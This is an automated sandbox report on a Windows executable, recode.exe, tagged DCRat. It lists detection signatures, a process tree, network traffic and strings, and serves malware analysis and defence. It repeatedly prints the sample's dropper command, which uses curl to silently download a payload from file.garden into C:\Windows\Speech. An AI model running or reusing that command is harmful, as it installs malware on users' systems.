Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
recode.exe

Overview

General Information

Sample name:recode.exe
Analysis ID:1590000
MD5:0023578e24d6ed38daf9c364137a8929
SHA1:8f99599b5ee81e2b2401a3ef7eb17026780a1bd9
SHA256:ff717b5311c7d23838e0f7c9f06d8967b43626dfcababc329386851e6e6d9cb3
Tags:DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected BlockedWebSite
AI detected suspicious sample
Creates HTML files with .exe extension (expired dropper behavior)
Machine Learning detection for sample
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to simulate mouse events
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Found large amount of non-executed APIs
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • recode.exe (PID: 1036 cmdline: "C:\Users\user\Desktop\recode.exe" MD5: 0023578E24D6ED38DAF9C364137A8929)
    • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6292 cmdline: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • curl.exe (PID: 6776 cmdline: curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • cmd.exe (PID: 5436 cmdline: C:\Windows\system32\cmd.exe /c cls MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Windows\Speech\physmeme.exeJoeSecurity_BlockedWebSiteYara detected BlockedWebSiteJoe Security
    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe, CommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\recode.exe", ParentImage: C:\Users\user\Desktop\recode.exe, ParentProcessId: 1036, ParentProcessName: recode.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe, ProcessId: 6292, ProcessName: cmd.exe
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: recode.exeAvira: detected
    Source: recode.exeReversingLabs: Detection: 57%
    Source: recode.exeVirustotal: Detection: 63%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
    Source: recode.exeJoe Sandbox ML: detected

    Phishing

    barindex
    Source: Yara matchFile source: C:\Windows\Speech\physmeme.exe, type: DROPPED
    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49708 version: TLS 1.2
    Source: recode.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: C:\Users\obey\Desktop\Source2\Build\recode.pdb source: recode.exe
    Source: Binary string: C:\Users\obey\Desktop\Source2\Build\recode.pdb99 source: recode.exe
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75805FC84 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,0_2_00007FF75805FC84

    Networking

    barindex
    Source: C:\Windows\System32\curl.exeFile created: physmeme.exe.4.dr
    Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
    Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
    Source: Joe Sandbox ViewJA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /ZloBYxFY2AfQRNoi/dx3d9.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: */*
    Source: global trafficDNS traffic detected: DNS query: file.garden
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 13 Jan 2025 12:16:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mrC2995L8eqQMizxCZ4zq68s0auO69Ec7YcfklffCOLthFeEj0z%2FRAaZ%2FX8l2pVXO8aeGLZ5KS9wSyDpTWAF7oC0NlNDWSJSB9bWVOLoUIhR4MNFmqWEko4fKwtvDA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901550d92b5a41ba-EWR
    Source: recode.exeString found in binary or memory: http://fontello.com
    Source: recode.exeString found in binary or memory: http://fontello.comCopyright
    Source: Amcache.hve.0.drString found in binary or memory: http://upx.sf.net
    Source: recode.exeString found in binary or memory: http://www.josbuivenga.demon.nl
    Source: recode.exeString found in binary or memory: http://www.josbuivenga.demon.nlCopyright
    Source: recode.exeString found in binary or memory: http://www.josbuivenga.demon.nlMuseo
    Source: curl.exe, 00000004.00000002.1422090928.000001CBB3440000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1422212842.000001CBB347A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418861005.000001CBB3453000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1422090928.000001CBB3448000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418751823.000001CBB3479000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418821905.000001CBB347A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin
    Source: curl.exe, 00000004.00000002.1422090928.000001CBB3440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin--outputC:
    Source: curl.exe, 00000004.00000002.1422212842.000001CBB347A000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418751823.000001CBB3479000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418821905.000001CBB347A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binC
    Source: curl.exe, 00000004.00000003.1418950817.000001CBB3456000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418861005.000001CBB3453000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1422090928.000001CBB3448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binN
    Source: curl.exe, 00000004.00000002.1422090928.000001CBB3448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.binn
    Source: recode.exeString found in binary or memory: https://fontawesome.com
    Source: recode.exeString found in binary or memory: https://fontawesome.comhttps://fontawesome.comFont
    Source: curl.exe, 00000004.00000003.1417827747.000001CBB34A5000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417929801.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417929801.000001CBB34A5000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417827747.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417996395.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418053562.000001CBB3461000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.4.drString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
    Source: curl.exe, 00000004.00000003.1417929801.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417827747.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1417996395.000001CBB34BF000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1418053562.000001CBB3461000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.4.drString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
    Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49708 version: TLS 1.2
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75800D270 OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,0_2_00007FF75800D270
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758019C70 OpenClipboard,MultiByteToWideChar,GlobalAlloc,GlobalLock,MultiByteToWideChar,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,CloseClipboard,0_2_00007FF758019C70
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75800D270 OpenClipboard,GetClipboardData,CloseClipboard,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,0_2_00007FF75800D270
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758046B70 GetAsyncKeyState,0_2_00007FF758046B70
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758031D00 GetClientRect,QueryPerformanceCounter,GetForegroundWindow,ClientToScreen,SetCursorPos,GetCursorPos,ScreenToClient,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_00007FF758031D00
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758053150: DeviceIoControl,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,FindWindowA,MessageBoxA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,SetWindowPos,SetLayeredWindowAttributes,GetWindowLongA,SetWindowLongA,SetWindowLongA,DwmExtendFrameIntoClientArea,ShowWindow,UpdateWindow,ShowWindow,0_2_00007FF758053150
    Source: C:\Windows\System32\curl.exeFile created: C:\Windows\Speech\physmeme.exeJump to behavior
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580026100_2_00007FF758002610
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580229200_2_00007FF758022920
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75803B9200_2_00007FF75803B920
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580531500_2_00007FF758053150
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580431B00_2_00007FF7580431B0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580479C00_2_00007FF7580479C0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75802D1C00_2_00007FF75802D1C0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75801B9F00_2_00007FF75801B9F0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758037A200_2_00007FF758037A20
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580372400_2_00007FF758037240
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758013A600_2_00007FF758013A60
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758036A600_2_00007FF758036A60
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580412800_2_00007FF758041280
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580382B00_2_00007FF7580382B0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580182E00_2_00007FF7580182E0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75800EB300_2_00007FF75800EB30
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758012B500_2_00007FF758012B50
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580393500_2_00007FF758039350
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758038B500_2_00007FF758038B50
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758035B600_2_00007FF758035B60
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580363800_2_00007FF758036380
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758039BC00_2_00007FF758039BC0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75802BBE00_2_00007FF75802BBE0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580474000_2_00007FF758047400
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75803A4300_2_00007FF75803A430
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75805CC300_2_00007FF75805CC30
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75803A4400_2_00007FF75803A440
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580354700_2_00007FF758035470
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75805FC840_2_00007FF75805FC84
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75802ACD00_2_00007FF75802ACD0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75802C4F00_2_00007FF75802C4F0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580254E00_2_00007FF7580254E0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758031D000_2_00007FF758031D00
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75802D5300_2_00007FF75802D530
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75802CD500_2_00007FF75802CD50
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75802FD400_2_00007FF75802FD40
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580425700_2_00007FF758042570
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75800ED600_2_00007FF75800ED60
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75803AD800_2_00007FF75803AD80
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75800D5A00_2_00007FF75800D5A0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75801DDD00_2_00007FF75801DDD0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758034DC00_2_00007FF758034DC0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580306100_2_00007FF758030610
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758041E000_2_00007FF758041E00
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580046400_2_00007FF758004640
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580136500_2_00007FF758013650
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580486500_2_00007FF758048650
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75801BE400_2_00007FF75801BE40
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75801C6400_2_00007FF75801C640
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580366600_2_00007FF758036660
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758030E600_2_00007FF758030E60
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758011EB00_2_00007FF758011EB0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75800D6D00_2_00007FF75800D6D0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580146C00_2_00007FF7580146C0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758018EF00_2_00007FF758018EF0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75802EEE00_2_00007FF75802EEE0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580217400_2_00007FF758021740
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75805E7400_2_00007FF75805E740
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580247600_2_00007FF758024760
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580347D00_2_00007FF7580347D0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75802E7E00_2_00007FF75802E7E0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75803D8500_2_00007FF75803D850
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580418600_2_00007FF758041860
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580320800_2_00007FF758032080
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580360A00_2_00007FF7580360A0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580318D00_2_00007FF7580318D0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580060D00_2_00007FF7580060D0
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580269100_2_00007FF758026910
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF7580351000_2_00007FF758035100
    Source: classification engineClassification label: mal76.phis.winEXE@9/2@1/2
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1524:120:WilError_03
    Source: recode.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\recode.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\recode.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: recode.exeReversingLabs: Detection: 57%
    Source: recode.exeVirustotal: Detection: 63%
    Source: recode.exeString found in binary or memory: hourglass-start
    Source: recode.exeString found in binary or memory: hands-helping
    Source: unknownProcess created: C:\Users\user\Desktop\recode.exe "C:\Users\user\Desktop\recode.exe"
    Source: C:\Users\user\Desktop\recode.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\recode.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exe
    Source: C:\Users\user\Desktop\recode.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c cls
    Source: C:\Users\user\Desktop\recode.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
    Source: C:\Users\user\Desktop\recode.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c clsJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZloBYxFY2AfQRNoi/dx3d9.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: d3dcompiler_47.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: msvcp140.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: vcruntime140.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: vcruntime140_1.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Users\user\Desktop\recode.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: recode.exeStatic PE information: Image base 0x140000000 > 0x60000000
    Source: recode.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
    Source: recode.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
    Source: recode.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
    Source: recode.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: recode.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
    Source: recode.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
    Source: recode.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: recode.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
    Source: Binary string: C:\Users\obey\Desktop\Source2\Build\recode.pdb source: recode.exe
    Source: Binary string: C:\Users\obey\Desktop\Source2\Build\recode.pdb99 source: recode.exe
    Source: recode.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: recode.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: recode.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: recode.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: recode.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758031B60 QueryPerformanceFrequency,QueryPerformanceCounter,LoadLibraryA,GetProcAddress,GetProcAddress,0_2_00007FF758031B60
    Source: recode.exeStatic PE information: section name: _RDATA
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF758017EC2 push rbp; iretd 0_2_00007FF758017EC3
    Source: C:\Users\user\Desktop\recode.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\recode.exeAPI coverage: 1.1 %
    Source: C:\Users\user\Desktop\recode.exeCode function: 0_2_00007FF75805FC84 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,0_2_00007FF75805FC84
    Source: Amcache.hve.0.drBinary or memory string: VMware
    Source: Amcache.hve.0.drBinary or memory string: VMware Virtual USB Mouse
    Source: recode.exe, 00000000.00000003.1728225180.000001D921FCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}u
    Source: Amcache.hve.0.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.0.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
    Source: Amcache.hve.0.drBinary or memory string: VMware, Inc.
    Source: Amcache.hve.0.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.0.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.0.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.0.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: curl.exe, 00000004.00000003.1418861005.000001CBB3453000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
    Source: Amcache.hve.0.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
